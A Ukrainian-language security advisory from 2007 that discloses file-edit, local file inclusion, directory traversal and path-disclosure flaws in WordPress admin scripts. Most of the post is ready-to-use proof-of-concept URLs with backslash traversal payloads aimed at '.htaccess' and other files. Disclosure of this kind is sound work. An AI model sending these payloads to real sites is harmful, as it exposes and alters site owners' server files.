Arbitrary file edit, Local file include, Directory traversal та Full path disclosure в WordPress
22:52 30.12.2007Сьогодні, в День багів в WordPress, я оприлюднюю численні уразливості в WP. Про деякі подібні уразливості я писав раніше.
В грудні, 02.12.2007 (в templates.php) і 22.12.2007, я знайшов Arbitrary file edit, Local file include, Directory traversal та Full path disclosure уразливості в WordPress. Дірки в файлі templates.php (в параметрах file та page) та файлах edit-pages.php, categories.php, edit-comments.php, moderation.php, post.php та page-new.php (в параметрі page).
Full path disclosure:
http://site/wp-admin/templates.php?file= (працює тільки в WP 2.0.11)
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
Дані скрипти вразливі до атаки з використанням зворотнього слеша (що працює лише на Windows).
Arbitrary file edit:
http://site/wp-admin/templates.php?file=\..\..\file
Local file include та Directory traversal:
http://site/wp-admin/templates.php?page=\..\..\file.php
http://site/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess
Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).